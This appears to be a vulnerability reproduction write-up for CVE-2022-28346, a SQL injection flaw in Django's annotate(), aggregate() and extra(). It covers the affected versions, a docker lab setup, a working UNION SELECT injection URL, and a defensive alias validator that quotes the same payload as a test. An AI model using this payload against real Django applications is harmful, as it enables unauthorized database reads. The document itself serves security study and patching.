CVE-2022-28346: Django SQL injection vulnerability
2022-07-07 22:52:00 [yggcwhat]
0x01 Introduction
Django is a free, open-source web framework written in Python. It covers almost every aspect of web application development and can be used to quickly build high-performance, elegant websites. Django ships with many modules commonly needed for site back-end development, so developers can concentrate on the business logic.
0x02 Vulnerability overview
Vulnerability ID: CVE-2022-28346
An attacker who passes a crafted dictionary via **kwargs to QuerySet.annotate(), aggregate() or extra() can achieve SQL injection through the column aliases these methods build from the dictionary keys.
0x03 Affected versions
4.0 <= Django < 4.0.4
3.2 <= Django < 3.2.13
2.2 <= Django < 2.2.28
0x04 Environment setup
docker pull s0cke3t/cve-2022-28346:latest
docker run -d -p 8080:8000 s0cke3t/cve-2022-28346
0x05 Reproduction
The error page reveals which endpoints exist.
Accessing an endpoint that takes parameters likewise produces an error message.
Use the parameter named in the error message to perform the SQL injection:
http://x.x.x.x:8000/demo?field=demo.name" FROM "demo_user" union SELECT "1",sqlite_version(),"3" --
0x06 Remediation
Patched versions have been released officially; download from:
https://www.djangoproject.com/download/
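Upgrading is the fix. As an added defence-in-depth example (not code from the original post or from the Django project), the following validator rejects untrusted dictionary keys before they are handed to annotate()/aggregate()/extra() as column aliases, and only allows the requested field if it is on an allowlist. The regular expression, the allowlist and the field names are assumptions made for this illustration.

```python
import re

# Characters that must never appear in a column alias: quotes, brackets,
# semicolons, whitespace and SQL comment markers. Constructed for this
# example as a sanity check on untrusted alias names.
FORBIDDEN_ALIAS_PATTERN = re.compile(r"['`\"\]\[;\s]|--|/\*|\*/")

# Hypothetical allowlist of model fields the demo endpoint may expose.
ALLOWED_FIELDS = {"name", "email", "created_at"}


def check_alias(alias):
    """Raise ValueError if the alias could break out of a quoted identifier."""
    if not isinstance(alias, str) or not alias:
        raise ValueError("Column alias must be a non-empty string.")
    if FORBIDDEN_ALIAS_PATTERN.search(alias):
        raise ValueError(
            "Column aliases cannot contain whitespace, quotation marks, "
            "semicolons or SQL comments."
        )
    return alias


def is_safe_alias(alias):
    """Boolean wrapper around check_alias for callers that prefer no exceptions."""
    try:
        check_alias(alias)
    except ValueError:
        return False
    return True


def safe_annotation_kwargs(requested):
    """Build the **kwargs for annotate()/extra() from request-controlled input.

    `requested` maps alias -> field name, e.g. parsed from ?field=... .
    Every key must pass check_alias and every value must be allowlisted.
    """
    cleaned = {}
    for alias, field in requested.items():
        check_alias(alias)
        if field not in ALLOWED_FIELDS:
            raise ValueError("Field %r is not exposed by this endpoint." % (field,))
        cleaned[alias] = field
    return cleaned


if __name__ == "__main__":
    # The payload quoted in this post is rejected; a plain alias is accepted.
    print(is_safe_alias('demo.name" FROM "demo_user" union SELECT "1",sqlite_version(),"3" --'))
    print(safe_annotation_kwargs({"display_name": "name"}))
```

The cleaned dictionary is what the view should unpack into the ORM call; the raw request dictionary should never reach it directly.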